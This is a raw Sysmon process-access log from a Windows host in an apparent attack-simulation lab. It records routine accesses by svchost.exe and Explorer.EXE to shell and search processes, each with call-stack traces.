07:51:42.242{466BC892-02BC-60E8-2C00-00000000CF01}30641160C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-02BC-60E8-2C00-00000000CF01}30641160C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001048435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 